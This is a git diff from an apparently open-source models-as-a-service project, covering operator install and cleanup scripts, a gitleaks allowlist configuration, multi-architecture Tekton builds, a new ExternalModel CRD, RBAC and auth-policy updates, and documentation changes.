diff --git a/.github/hack/cleanup-odh.sh b/.github/hack/cleanup-odh.sh index fd14760b3..e665f92b7 100755 --- a/.github/hack/cleanup-odh.sh +++ b/.github/hack/cleanup-odh.sh @@ -77,6 +77,10 @@ kubectl delete operatorgroup odh-operator-group -n odh-operator --ignore-not-fou echo "7. Deleting odh-operator namespace..." kubectl delete ns odh-operator --ignore-not-found --timeout=120s 2>/dev/null || true +# 8. Delete opendatahub namespace (contains deployed components) +echo "8. Deleting opendatahub namespace..." +kubectl delete ns opendatahub --ignore-not-found --timeout=120s 2>/dev/null || true + force_delete_namespace() { local ns=$1 shift @@ -107,10 +111,6 @@ force_delete_namespace() { kubectl wait --for=delete namespace/"$ns" --timeout=30s 2>/dev/null || true } -# 8. Delete opendatahub namespace (contains deployed components) -echo "8. Deleting opendatahub namespace..." -force_delete_namespace "opendatahub" "maasmodelrefs.maas.opendatahub.io" - # 9. Delete models-as-a-service namespace (contains MaaS CRs) echo "9. Deleting models-as-a-service namespace..." force_delete_namespace "models-as-a-service" \ @@ -120,12 +120,12 @@ force_delete_namespace "models-as-a-service" \ for policy_ns in kuadrant-system rh-connectivity-link; do echo "10. Deleting $policy_ns namespace (if installed)..." force_delete_namespace "$policy_ns" \ - "authorinos.operator.authorino.kuadrat.io" "kuadrants.kuadrant.io" "limitadors.limitador.kuadrant.io" + "authorinos.operator.authorino.kuadrant.io" "kuadrants.kuadrant.io" "limitadors.limitador.kuadrant.io" done # 11. Delete llm namespace and model resources echo "11. Deleting LLM models and namespace..." -force_delete_namespace "llm" "llminferenceservice" "inferenceservice" +force_delete_namespace "llm" "llminferenceservice" "inferenceservice" "maasmodelrefs.maas.opendatahub.io" # 12. Delete gateway resources in openshift-ingress echo "12. Deleting gateway resources..." 
diff --git a/.github/hack/install-odh.sh b/.github/hack/install-odh.sh index 616a7d664..e5dfc59cc 100755 --- a/.github/hack/install-odh.sh +++ b/.github/hack/install-odh.sh @@ -5,9 +5,12 @@ # Prerequisites: cert-manager and LWS operators (run install-cert-manager-and-lws.sh first). # # Environment variables: -# OPERATOR_CATALOG - Custom catalog image (optional). When unset, uses community-operators (ODH 3.3). +# OPERATOR_CATALOG - Custom catalog image (optional). When unset, uses community-operators. # Set to e.g. quay.io/opendatahub/opendatahub-operator-catalog:latest for custom builds. -# OPERATOR_CHANNEL - Subscription channel (default: fast-3 for community, fast for custom catalog) +# OPERATOR_CHANNEL - Subscription channel (default: fast-3) +# OPERATOR_STARTING_CSV - Pin Subscription startingCSV (default: opendatahub-operator.v3.4.0-ea.1). Set to "-" to omit. +# OPERATOR_INSTALL_PLAN_APPROVAL - Manual (default) or Automatic; use "-" to omit. +# Manual: blocks auto-upgrades; this script auto-approves only the first InstallPlan so install does not stall. # OPERATOR_IMAGE - Custom operator image to patch into CSV (optional) # # Usage: ./install-odh.sh @@ -21,6 +24,8 @@ DATA_DIR="${REPO_ROOT}/scripts/data" NAMESPACE="${OPERATOR_NAMESPACE:-opendatahub}" OPERATOR_CATALOG="${OPERATOR_CATALOG:-}" OPERATOR_CHANNEL="${OPERATOR_CHANNEL:-}" +OPERATOR_STARTING_CSV="${OPERATOR_STARTING_CSV:-}" +OPERATOR_INSTALL_PLAN_APPROVAL="${OPERATOR_INSTALL_PLAN_APPROVAL:-}" OPERATOR_IMAGE="${OPERATOR_IMAGE:-}" # Source deployment helpers @@ -59,19 +64,27 @@ patch_operator_csv_if_needed() { echo "=== Installing OpenDataHub operator ===" echo "" -# 1. Catalog setup: use community-operators (ODH 3.3) by default, or custom catalog when OPERATOR_CATALOG is set +# 1. Catalog setup: community-operators by default, or custom catalog when OPERATOR_CATALOG is set echo "1. Setting up ODH catalog..." 
if [[ -n "$OPERATOR_CATALOG" ]]; then echo " Using custom catalog: $OPERATOR_CATALOG" create_custom_catalogsource "odh-custom-catalog" "openshift-marketplace" "$OPERATOR_CATALOG" catalog_source="odh-custom-catalog" - channel="${OPERATOR_CHANNEL:-fast}" + channel="${OPERATOR_CHANNEL:-fast-3}" else - echo " Using community-operators (ODH 3.3)" + echo " Using community-operators" catalog_source="community-operators" channel="${OPERATOR_CHANNEL:-fast-3}" fi +# Pin to ODH 3.4 EA1 unless overridden (omit with OPERATOR_STARTING_CSV=- to follow channel head) +starting_csv="${OPERATOR_STARTING_CSV:-opendatahub-operator.v3.4.0-ea.1}" +[[ "$starting_csv" == "-" ]] && starting_csv="" + +# Manual = no auto-upgrades; install_olm_operator still approves the first InstallPlan programmatically +plan_approval="${OPERATOR_INSTALL_PLAN_APPROVAL:-Manual}" +[[ "$plan_approval" == "-" ]] && plan_approval="" + # 2. Install ODH operator via OLM echo "2. Installing ODH operator..." install_olm_operator \ @@ -79,8 +92,10 @@ install_olm_operator \ "$NAMESPACE" \ "$catalog_source" \ "$channel" \ - "" \ - "AllNamespaces" + "$starting_csv" \ + "AllNamespaces" \ + "openshift-marketplace" \ + "$plan_approval" # 3. Patch CSV with custom image if specified if [[ -n "$OPERATOR_IMAGE" ]]; then diff --git a/.github/hack/uninstall-leader-worker-set.sh b/.github/hack/uninstall-leader-worker-set.sh deleted file mode 100755 index d41cc795f..000000000 --- a/.github/hack/uninstall-leader-worker-set.sh +++ /dev/null @@ -1,60 +0,0 @@ -#!/usr/bin/env bash -# Completely remove the LeaderWorkerSet (LWS) operator from the cluster. -# -# Prerequisites: oc/kubectl with cluster-admin -# Usage: ./hack/uninstall-leader-worker-set.sh - -set -euo pipefail - -echo "=========================================" -echo "Uninstalling LeaderWorkerSet operator" -echo "=========================================" -echo "" - -# 1. Delete all LeaderWorkerSet CRs (operator creates these for LLMInferenceService multi-node) -echo "1. 
Deleting LeaderWorkerSet resources..." -if oc get leaderworkerset -A --no-headers 2>/dev/null | grep -q .; then - oc delete leaderworkerset -A --all --timeout=120s --ignore-not-found=true || true - echo " Waiting for LeaderWorkerSet cleanup..." - sleep 5 -else - echo " No LeaderWorkerSet resources found" -fi - -# 2. Delete LeaderWorkerSetOperator CR -echo "2. Deleting LeaderWorkerSetOperator CR..." -oc delete leaderworkersetoperator cluster -n openshift-lws-operator --timeout=60s --ignore-not-found=true || true - -# 3. Delete Subscription -echo "3. Deleting LWS Subscription..." -oc delete subscription leader-worker-set -n openshift-lws-operator --timeout=60s --ignore-not-found=true || true - -# 4. Delete CSV (by label or name prefix) -echo "4. Deleting LWS CSV..." -for csv in $(oc get csv -n openshift-lws-operator --no-headers 2>/dev/null | grep -E 'leader-worker-set|leaderworkerset' | awk '{print $1}'); do - oc delete csv "$csv" -n openshift-lws-operator --timeout=60s --ignore-not-found=true || true -done - -# 5. Delete OperatorGroup -echo "5. Deleting LWS OperatorGroup..." -oc delete operatorgroup leader-worker-set -n openshift-lws-operator --timeout=60s --ignore-not-found=true || true - -# 6. Delete namespace -echo "6. Deleting openshift-lws-operator namespace..." -oc delete namespace openshift-lws-operator --timeout=300s --ignore-not-found=true || true - -# 7. Delete CRDs (removes the API types entirely) -echo "7. Deleting LeaderWorkerSet CRDs..." 
-oc delete crd leaderworkersets.leaderworkerset.x-k8s.io --timeout=60s --ignore-not-found=true || true -oc delete crd leaderworkersetoperators.operator.openshift.io --timeout=60s --ignore-not-found=true || true - -echo "" -echo "=========================================" -echo "LeaderWorkerSet operator removed" -echo "=========================================" -echo "" -echo "Verify:" -echo " oc get subscription,csv,operatorgroup -n openshift-lws-operator" -echo " oc get crd | grep leaderworkerset" -echo " oc get namespace openshift-lws-operator" -echo "" diff --git a/.gitignore b/.gitignore index 7dd334130..0265312dd 100644 --- a/.gitignore +++ b/.gitignore @@ -29,6 +29,7 @@ __pycache__/ *$py.class *.so .Python +.venv/ env/ venv/ ENV/ @@ -37,8 +38,19 @@ venv.bak/ pip-log.txt pip-delete-this-directory.txt .coverage +coverage.xml .pytest_cache/ +.mypy_cache/ +.ruff_cache/ +.tox/ htmlcov/ + +# Test / build reports +reports/ + +# OS / editor cruft +.DS_Store +.vscode/ apps/frontend/.env.local apps/backend/.env CLAUDE.md diff --git a/.gitleaks.toml b/.gitleaks.toml new file mode 100644 index 000000000..2a04f6d0c --- /dev/null +++ b/.gitleaks.toml @@ -0,0 +1,67 @@ +# Gitleaks configuration for opendatahub-io repos +# Synced from security-config. Do not edit in target repos. +# +# Path allowlists use Go regex syntax. +# Real credentials should NEVER be committed to any repository. + +[extend] + useDefault = true + +[allowlist] + description = "Exclude test fixtures, mock data, sample configs, and CI resources" + paths = [ + # Go test files (commonly contain mock credentials) + '''.*_test\.go$''', + + # JS/TS test files (.spec.ts, .test.tsx, etc.) 
+ '''.*\.spec\.(ts|tsx|js|jsx)$''', + '''.*\.test\.(ts|tsx|js|jsx)$''', + + # JS/TS test directories + '''__tests__/''', + + # Go testdata directories + '''testdata/''', + + # Python test data directories + '''test_data/''', + + # Test fixtures + '''fixtures/''', + + # JavaScript/TypeScript mocks + '''__mocks__/''', + + # Go/Java/TS mock directories + '''mocks/''', + '''k8mocks/''', + + # Sample and example configs with placeholder credentials + '''docs/samples/''', + '''config/samples/''', + '''config/overlays/test/''', + + # CI/GitHub Actions test resources + '''\.github/resources/''', + + # E2E test credentials + '''test/e2e/credentials/''', + '''tests/e2e/credentials/''', + + # OpenShift CI sample resources + '''openshift-ci/resources/samples/''', + + # Cypress test data + '''cypress/fixtures/''', + '''cypress/tests/mocked/''', + + # Test certificate and key files + '''tests/data/.*\.(pem|crt|key)$''', + ] + + # Known test/placeholder credentials used in documentation and tests + regexes = [ + '''database-password\s*:\s*"?(The)?BlurstOfTimes"?''', + '''database-user\s*:\s*"?mlmduser"?''', + '''database-user\s*:\s*"?modelregistryuser"?''', + ] diff --git a/.gitleaksignore b/.gitleaksignore new file mode 100644 index 000000000..e2d509a42 --- /dev/null +++ b/.gitleaksignore @@ -0,0 +1,5 @@ +# Gitleaks ignore file +# Add false positive fingerprints below (one per line) +# Format: commit:file:rule-id:line or file:rule-id:line +# +# For path-based exclusions, use .gitleaks.toml allowlist instead. 
diff --git a/.tekton/odh-maas-api-pull-request.yaml b/.tekton/odh-maas-api-pull-request.yaml index dd7127774..0f5d1adc9 100644 --- a/.tekton/odh-maas-api-pull-request.yaml +++ b/.tekton/odh-maas-api-pull-request.yaml @@ -29,6 +29,12 @@ spec: value: maas-api/Dockerfile - name: path-context value: maas-api + - name: build-platforms + value: + - linux/x86_64 + - linux/arm64 + - linux/ppc64le + - linux/s390x - name: additional-tags value: - 'odh-pr-{{revision}}' diff --git a/.tekton/odh-maas-api-push.yaml b/.tekton/odh-maas-api-push.yaml index f4892c604..67b015c77 100644 --- a/.tekton/odh-maas-api-push.yaml +++ b/.tekton/odh-maas-api-push.yaml @@ -28,6 +28,12 @@ spec: value: maas-api/Dockerfile - name: path-context value: maas-api + - name: build-platforms + value: + - linux/x86_64 + - linux/arm64 + - linux/ppc64le + - linux/s390x pipelineRef: resolver: git params: diff --git a/.tekton/odh-maas-controller-pull-request.yaml b/.tekton/odh-maas-controller-pull-request.yaml index d7d757cc2..fbfe43b96 100644 --- a/.tekton/odh-maas-controller-pull-request.yaml +++ b/.tekton/odh-maas-controller-pull-request.yaml @@ -34,6 +34,12 @@ spec: - 'odh-pr-{{revision}}' - name: pipeline-type value: pull-request + - name: build-platforms + value: + - linux/x86_64 + - linux/arm64 + - linux/ppc64le + - linux/s390x pipelineRef: resolver: git params: diff --git a/.tekton/odh-maas-controller-push.yaml b/.tekton/odh-maas-controller-push.yaml index 8f882f415..3eab7ab1e 100644 --- a/.tekton/odh-maas-controller-push.yaml +++ b/.tekton/odh-maas-controller-push.yaml @@ -28,6 +28,12 @@ spec: value: Dockerfile - name: path-context value: maas-controller + - name: build-platforms + value: + - linux/x86_64 + - linux/arm64 + - linux/ppc64le + - linux/s390x pipelineRef: resolver: git params: diff --git a/OWNERS b/OWNERS index c9c440f1b..fab047100 100644 --- a/OWNERS +++ b/OWNERS @@ -4,6 +4,7 @@ approvers: - chaitanya1731 - nerdalert - jland-redhat + - nirrozenbaum - dmytro-zaharnytskyi - SB159 - noyitz 
@@ -21,6 +22,7 @@ reviewers: - chaitanya1731 - nerdalert - jland-redhat + - nirrozenbaum - dmytro-zaharnytskyi - SB159 - noyitz diff --git a/README.md b/README.md index 9231fbbcb..d5d9dcb0e 100644 --- a/README.md +++ b/README.md @@ -59,12 +59,9 @@ For detailed instructions, see the [Deployment Guide](docs/content/quickstart.md |------|--------|---------|-------------| | `--deployment-mode` | `operator`, `kustomize` | `operator` | Deployment method | | `--operator-type` | `rhoai`, `odh` | `rhoai` | Which operator to install | -| `--policy-engine` | `rhcl`, `kuadrant` | auto | Gateway policy engine (rhcl for operators, kuadrant for kustomize) | | `--enable-tls-backend` | flag | enabled | TLS for Authorino ↔ MaaS API | -| `--skip-certmanager` | flag | auto-detect | Skip cert-manager installation | -| `--skip-lws` | flag | auto-detect | Skip LeaderWorkerSet installation | +| `--disable-tls-backend` | flag | `false` | Disable TLS backend | | `--namespace` | string | auto | Target namespace | -| `--timeout` | seconds | `300` | Operation timeout | | `--verbose` | flag | false | Enable debug logging | | `--dry-run` | flag | false | Show plan without executing | | `--help` | flag | - | Display full help | @@ -82,14 +79,16 @@ For detailed instructions, see the [Deployment Guide](docs/content/quickstart.md | Variable | Description | Example | |----------|-------------|---------| | `MAAS_API_IMAGE` | Custom MaaS API container image (works in both operator and kustomize modes) | `quay.io/user/maas-api:pr-123` | +| `MAAS_CONTROLLER_IMAGE` | Custom MaaS controller container image | `quay.io/user/maas-controller:pr-123` | | `OPERATOR_CATALOG` | Custom operator catalog | `quay.io/opendatahub/catalog:pr-456` | | `OPERATOR_IMAGE` | Custom operator image | `quay.io/opendatahub/operator:pr-456` | | `OPERATOR_TYPE` | Operator type (rhoai/odh) | `odh` | -| `POLICY_ENGINE` | Policy engine (rhcl/kuadrant) | `kuadrant` | | `LOG_LEVEL` | Logging verbosity | `DEBUG`, `INFO`, `WARN`, `ERROR` | 
**Note:** TLS backend is enabled by default. Use `--disable-tls-backend` to disable. +**Note:** The policy engine is auto-determined based on operator type (`rhcl` for RHOAI, `kuadrant` for ODH/kustomize) and does not need to be set manually. + ### Deployment Examples #### Standard Deployments @@ -119,9 +118,6 @@ MAAS_API_IMAGE=quay.io/myuser/maas-api:pr-123 \ #### Minimal Deployments ```bash -# Skip optional operators (if already installed) -./scripts/deploy.sh --skip-certmanager --skip-lws - # Deploy without TLS backend (HTTP tier lookup) ./scripts/deploy.sh --disable-tls-backend ``` diff --git a/deployment/base/maas-api/core/deployment.yaml b/deployment/base/maas-api/core/deployment.yaml index fa459843b..3124bc103 100644 --- a/deployment/base/maas-api/core/deployment.yaml +++ b/deployment/base/maas-api/core/deployment.yaml @@ -24,6 +24,8 @@ spec: fieldPath: metadata.namespace - name: SECURE value: "false" + - name: MAAS_SUBSCRIPTION_NAMESPACE + value: "models-as-a-service" resources: requests: memory: "64Mi" diff --git a/deployment/base/maas-api/policies/auth-policy.yaml b/deployment/base/maas-api/policies/auth-policy.yaml index 518861575..2e2bb04b5 100644 --- a/deployment/base/maas-api/policies/auth-policy.yaml +++ b/deployment/base/maas-api/policies/auth-policy.yaml @@ -29,7 +29,10 @@ spec: when: - predicate: request.headers.authorization.startsWith("Bearer sk-oai-") http: - url: https://maas-api.opendatahub.svc.cluster.local:8443/internal/v1/api-keys/validate + # Placeholder URL - gets patched based on deployment mode: + # - Operator mode (ODH/RHOAI): ODH overlay replacement (app-namespace param) + # - Kustomize mode: deploy.sh script patches with $NAMESPACE via sed + url: https://maas-api.placehold.svc.cluster.local:8443/internal/v1/api-keys/validate method: POST contentType: application/json body: @@ -79,3 +82,12 @@ spec: selector: auth.identity.user.groups.@tostr key: X-MaaS-Group priority: 1 + # Subscription: from API key validation (when API key with 
subscription used) + # This header is used by /v1/models to determine which subscription's models to return + X-MaaS-Subscription: + when: + - predicate: request.headers.authorization.startsWith("Bearer sk-oai-") + - predicate: auth.metadata.apiKeyValidation.subscription != "" + plain: + selector: auth.metadata.apiKeyValidation.subscription + priority: 0 diff --git a/deployment/base/maas-api/rbac/clusterrole.yaml b/deployment/base/maas-api/rbac/clusterrole.yaml index c053efcfb..d1f1cbfca 100644 --- a/deployment/base/maas-api/rbac/clusterrole.yaml +++ b/deployment/base/maas-api/rbac/clusterrole.yaml @@ -30,6 +30,11 @@ rules: resources: ["tokenreviews"] verbs: ["create"] +# Subject access review for admin authorization (SAR-based admin check) +- apiGroups: ["authorization.k8s.io"] + resources: ["subjectaccessreviews"] + verbs: ["create"] + # MaaS CRs for the models endpoint and subscription selector (cached via informer) - apiGroups: ["maas.opendatahub.io"] resources: ["maasmodelrefs", "maassubscriptions"] diff --git a/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_externalmodels.yaml b/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_externalmodels.yaml new file mode 100644 index 000000000..214e6c921 --- /dev/null +++ b/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_externalmodels.yaml @@ -0,0 +1,164 @@ +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + annotations: + controller-gen.kubebuilder.io/version: v0.16.4 + name: externalmodels.maas.opendatahub.io +spec: + group: maas.opendatahub.io + names: + kind: ExternalModel + listKind: ExternalModelList + plural: externalmodels + singular: externalmodel + scope: Namespaced + versions: + - additionalPrinterColumns: + - jsonPath: .spec.provider + name: Provider + type: string + - jsonPath: .spec.endpoint + name: Endpoint + type: string + - jsonPath: .status.phase + name: Phase + type: string + - jsonPath: .metadata.creationTimestamp + name: 
Age + type: date + name: v1alpha1 + schema: + openAPIV3Schema: + description: |- + ExternalModel is the Schema for the externalmodels API. + It defines an external LLM provider (e.g., OpenAI, Anthropic) that can be + referenced by MaaSModelRef resources. + properties: + apiVersion: + description: |- + APIVersion defines the versioned schema of this representation of an object. + Servers should convert recognized schemas to the latest internal value, and + may reject unrecognized values. + More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + type: string + kind: + description: |- + Kind is a string value representing the REST resource this object represents. + Servers may infer this from the endpoint the client submits requests to. + Cannot be updated. + In CamelCase. + More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + type: string + metadata: + type: object + spec: + description: ExternalModelSpec defines the desired state of ExternalModel + properties: + credentialRef: + description: |- + CredentialRef references a Kubernetes Secret containing the provider API key. + The Secret must contain a data key "api-key" with the credential value. + properties: + name: + description: Name is the name of the Secret + maxLength: 253 + minLength: 1 + type: string + required: + - name + type: object + endpoint: + description: |- + Endpoint is the FQDN of the external provider (no scheme or path). + e.g. "api.openai.com". + This field is metadata for downstream consumers (e.g. BBR provider-resolver plugin) + and is not used by the controller for endpoint derivation. + maxLength: 253 + pattern: ^[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?)*$ + type: string + provider: + description: |- + Provider identifies the API format and auth type for the external model. + e.g. "openai", "anthropic". 
+ maxLength: 63 + type: string + required: + - credentialRef + - endpoint + - provider + type: object + status: + description: ExternalModelStatus defines the observed state of ExternalModel + properties: + conditions: + description: Conditions represent the latest available observations + of the external model's state + items: + description: Condition contains details for one aspect of the current + state of this API Resource. + properties: + lastTransitionTime: + description: |- + lastTransitionTime is the last time the condition transitioned from one status to another. + This should be when the underlying condition changed. If that is not known, then using the time when the API field changed is acceptable. + format: date-time + type: string + message: + description: |- + message is a human readable message indicating details about the transition. + This may be an empty string. + maxLength: 32768 + type: string + observedGeneration: + description: |- + observedGeneration represents the .metadata.generation that the condition was set based upon. + For instance, if .metadata.generation is currently 12, but the .status.conditions[x].observedGeneration is 9, the condition is out of date + with respect to the current state of the instance. + format: int64 + minimum: 0 + type: integer + reason: + description: |- + reason contains a programmatic identifier indicating the reason for the condition's last transition. + Producers of specific condition types may define expected values and meanings for this field, + and whether the values are considered a guaranteed API. + The value should be a CamelCase string. + This field may not be empty. + maxLength: 1024 + minLength: 1 + pattern: ^[A-Za-z]([A-Za-z0-9_,:]*[A-Za-z0-9_])?$ + type: string + status: + description: status of the condition, one of True, False, Unknown. + enum: + - "True" + - "False" + - Unknown + type: string + type: + description: type of condition in CamelCase or in foo.example.com/CamelCase. 
+ maxLength: 316 + pattern: ^([a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*/)?(([A-Za-z0-9][-A-Za-z0-9_.]*)?[A-Za-z0-9])$ + type: string + required: + - lastTransitionTime + - message + - reason + - status + - type + type: object + type: array + phase: + description: Phase represents the current phase of the external model + enum: + - Pending + - Ready + - Failed + type: string + type: object + type: object + served: true + storage: true + subresources: + status: {} diff --git a/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_maasmodelrefs.yaml b/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_maasmodelrefs.yaml index 58cdaeb13..3d8b5b904 100644 --- a/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_maasmodelrefs.yaml +++ b/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_maasmodelrefs.yaml @@ -65,13 +65,21 @@ spec: description: ModelRef references the actual model endpoint properties: kind: - description: Kind determines which fields are available + description: |- + Kind determines which backend handles this model reference. + LLMInferenceService: references a KServe LLMInferenceService. + ExternalModel: references an ExternalModel CR containing provider config. enum: - LLMInferenceService - ExternalModel type: string name: - description: Name is the name of the model resource + description: |- + Name is the name of the model resource. + For LLMInferenceService, this is the InferenceService name. + For ExternalModel, this is the ExternalModel CR name. + maxLength: 253 + minLength: 1 type: string required: - kind diff --git a/deployment/base/maas-controller/crd/kustomization.yaml b/deployment/base/maas-controller/crd/kustomization.yaml index be88931e7..8fca2319c 100644 --- a/deployment/base/maas-controller/crd/kustomization.yaml +++ b/deployment/base/maas-controller/crd/kustomization.yaml @@ -1,5 +1,6 @@ # This kustomization.yaml is used for CRD generation. 
resources: + - bases/maas.opendatahub.io_externalmodels.yaml - bases/maas.opendatahub.io_maasauthpolicies.yaml - bases/maas.opendatahub.io_maasmodelrefs.yaml - bases/maas.opendatahub.io_maassubscriptions.yaml diff --git a/deployment/base/maas-controller/rbac/clusterrole.yaml b/deployment/base/maas-controller/rbac/clusterrole.yaml index 1dbff7900..2c8cfef64 100644 --- a/deployment/base/maas-controller/rbac/clusterrole.yaml +++ b/deployment/base/maas-controller/rbac/clusterrole.yaml @@ -4,13 +4,13 @@ metadata: name: maas-controller-role rules: - apiGroups: ["maas.opendatahub.io"] - resources: ["maasauthpolicies", "maasmodelrefs", "maassubscriptions"] + resources: ["externalmodels", "maasauthpolicies", "maasmodelrefs", "maassubscriptions"] verbs: ["create", "delete", "get", "list", "patch", "update", "watch"] - apiGroups: ["maas.opendatahub.io"] - resources: ["maasauthpolicies/finalizers", "maasmodelrefs/finalizers", "maassubscriptions/finalizers"] + resources: ["externalmodels/finalizers", "maasauthpolicies/finalizers", "maasmodelrefs/finalizers", "maassubscriptions/finalizers"] verbs: ["update"] - apiGroups: ["maas.opendatahub.io"] - resources: ["maasauthpolicies/status", "maasmodelrefs/status", "maassubscriptions/status"] + resources: ["externalmodels/status", "maasauthpolicies/status", "maasmodelrefs/status", "maassubscriptions/status"] verbs: ["get", "patch", "update"] - apiGroups: ["gateway.networking.k8s.io"] resources: ["gateways"] @@ -24,3 +24,6 @@ rules: - apiGroups: ["serving.kserve.io"] resources: ["llminferenceservices"] verbs: ["get", "list", "watch"] +- apiGroups: [""] + resources: ["namespaces"] + verbs: ["create", "get", "list", "watch"] diff --git a/deployment/overlays/odh/kustomization.yaml b/deployment/overlays/odh/kustomization.yaml index 7218fcc83..50cc3ca34 100644 --- a/deployment/overlays/odh/kustomization.yaml +++ b/deployment/overlays/odh/kustomization.yaml @@ -125,6 +125,14 @@ replacements: name: maas-parameters fieldPath: data.app-namespace 
targets: + - select: + kind: AuthPolicy + name: maas-api-auth-policy + fieldPaths: + - spec.rules.metadata.apiKeyValidation.http.url + options: + delimiter: "." + index: 1 - select: kind: DestinationRule name: maas-api-backend-tls @@ -133,3 +141,13 @@ replacements: options: delimiter: "." index: 1 + - select: + kind: ClusterRoleBinding + name: maas-controller-rolebinding + fieldPaths: + - subjects.0.namespace + - select: + kind: RoleBinding + name: maas-controller-leader-election-rolebinding + fieldPaths: + - subjects.0.namespace diff --git a/deployment/overlays/tls-backend/README.md b/deployment/overlays/tls-backend/README.md index 395de51e7..7d1fcc00d 100644 --- a/deployment/overlays/tls-backend/README.md +++ b/deployment/overlays/tls-backend/README.md @@ -7,7 +7,8 @@ Enables end-to-end TLS for maas-api using OpenShift serving certificates. | File | Purpose | |------|---------| | `kustomization.yaml` | References base TLS overlay and policies, applies HTTPS patches | -| `configure-authorino-tls.sh` | Configures Authorino TLS settings and CA bundle for HTTPS tier lookup | + +Authorino TLS is configured by `scripts/setup-authorino-tls.sh` (run automatically by `deploy.sh` or manually). ## Traffic Flow @@ -38,7 +39,7 @@ Authorino → maas-api :8443 → /v1/tiers/lookup The deployment script automatically: 1. Applies the kustomize overlay -2. Configures Authorino for TLS using `configure-authorino-tls.sh` +2. Configures Authorino for TLS using `scripts/setup-authorino-tls.sh` 3. 
Restarts deployments to pick up certificates ### Manual Deployment (Advanced) @@ -48,13 +49,15 @@ The deployment script automatically: kustomize build deployment/overlays/tls-backend | kubectl apply -f - # Configure Authorino for TLS (operator-managed, can't be patched via Kustomize) -./deployment/overlays/tls-backend/configure-authorino-tls.sh +./scripts/setup-authorino-tls.sh # Restart to pick up certificates kubectl rollout restart deployment/maas-api -n maas-api kubectl rollout restart deployment/authorino -n kuadrant-system ``` +**Note:** `scripts/setup-authorino-tls.sh` patches Authorino's service, CR, and deployment. Use `--disable-tls-backend` with `deploy.sh` to skip if you manage Authorino TLS separately. + ## Why the script? Authorino resources are managed by the Kuadrant operator. Kustomize can't patch them because they don't exist in our manifests; they're created by the operator. The script uses `kubectl patch` to configure TLS on the live resources. diff --git a/docs/REMINDER-openshift-ai-inference.md b/docs/REMINDER-openshift-ai-inference.md new file mode 100644 index 000000000..5ee7ecc71 --- /dev/null +++ b/docs/REMINDER-openshift-ai-inference.md @@ -0,0 +1,22 @@ +# Reminder: openshift-ai-inference Gateway Removed from Docs + +**Date:** 2026-03-08 + +The `openshift-ai-inference` Gateway was removed from the [MaaS setup documentation](content/install/maas-setup.md) because it was believed to be unnecessary for the current version. + +**What was removed:** +- The YAML block that created the `openshift-ai-inference` Gateway (in `openshift-ingress` namespace) +- The Gateway Architecture info note that described the segregated gateway approach + +**If you find out later that openshift-ai-inference IS needed**, restore it by: + +1. Re-adding the Gateway YAML to `docs/content/install/maas-setup.md` in the "Create Gateway" section, before the maas-default-gateway block +2. 
Re-adding the Gateway Architecture info note + +The original content was: +- Gateway name: `openshift-ai-inference` +- Namespace: `openshift-ingress` +- Infrastructure label: `serving.kserve.io/gateway: kserve-ingress-gateway` +- Purpose: Standard KServe inference (vs maas-default-gateway for token auth and rate limiting) + +**Reference:** The Gateway is still defined in `deployment/base/networking/odh/odh-gateway-api.yaml` if needed for kustomize deployments. diff --git a/docs/content/advanced-administration/observability.md b/docs/content/advanced-administration/observability.md index edddb43aa..6e550af95 100644 --- a/docs/content/advanced-administration/observability.md +++ b/docs/content/advanced-administration/observability.md @@ -18,7 +18,7 @@ The observability stack consists of: - **Limitador**: Rate limiting service that exposes usage and rate-limit metrics (with labels from TelemetryPolicy) - **Authorino**: Authentication/authorization service that exposes auth evaluation metrics (`auth_server_*`) -- **Istio Telemetry**: Adds `tier` to gateway latency metrics for per-tier latency (P50/P95/P99) +- **Istio Telemetry**: Adds `subscription` to gateway latency metrics for per-subscription latency (P50/P95/P99) - **vLLM / llm-d / Simulator**: Expose inference metrics (TTFT, ITL, queue depth, token throughput, KV-cache usage); llm-d also exposes EPP routing metrics - **Prometheus**: Metrics collection and storage (uses OpenShift platform Prometheus) - **ServiceMonitors**: Deployed to configure Prometheus metric scraping @@ -46,7 +46,7 @@ The observability stack is defined in `deployment/base/observability/`. It inclu | **TelemetryPolicy** (`gateway-telemetry-policy.yaml`) | Adds `user`, `tier`, and `model` labels to Limitador metrics. The `model` label (from `responseBodyJSON`) is available on `authorized_hits`; `authorized_calls` and `limited_calls` carry `user` and `tier`. 
| | **Istio Telemetry** (`istio-gateway-telemetry.yaml`) | Adds `tier` label to gateway latency (`istio_request_duration_milliseconds_bucket`) for per-tier P50/P95/P99. | -**Deploy observability** (after Gateway and AuthPolicy are in place, so `X-MaaS-Tier` is injected): +**Deploy observability** (after Gateway and AuthPolicy are in place, so `X-MaaS-Subscription` is injected): ./scripts/observability/install-observability.sh [--namespace NAMESPACE] @@ -56,7 +56,7 @@ When using the full deployment script, this is applied automatically: !!! note "Prerequisites" - **Tools**: `kubectl`, `kustomize`, `jq`, `yq` must be installed - - **Cluster state**: Gateway, AuthPolicy (gateway-auth-policy), and tier lookup must be deployed first. The AuthPolicy injects `X-MaaS-Tier`, which Istio Telemetry reads to label latency by tier. Without it, the `tier` label on gateway latency will be empty. + - **Cluster state**: Gateway, AuthPolicy (gateway-auth-policy), and subscription selection must be deployed first. The AuthPolicy injects `X-MaaS-Subscription`, which Istio Telemetry reads to label latency by subscription. Without it, the `subscription` label on gateway latency will be empty. - **Namespace**: Use `--namespace` if your MaaS API is deployed to a namespace other than `maas-api` (e.g. `--namespace opendatahub`) **Optional:** The Istio gateway (Envoy) ServiceMonitor is included in `deployment/base/observability/` and deployed automatically by `install-observability.sh`. @@ -81,14 +81,14 @@ When Kuadrant TelemetryPolicy and TokenRateLimitPolicy are applied, Limitador ex | Metric | Type | Labels | Description | |--------|------|--------|-------------| -| `authorized_hits` | Counter | `user`, `tier`, `model`, `limitador_namespace` | Total tokens consumed per request (from `usage.total_tokens` in the model response; input 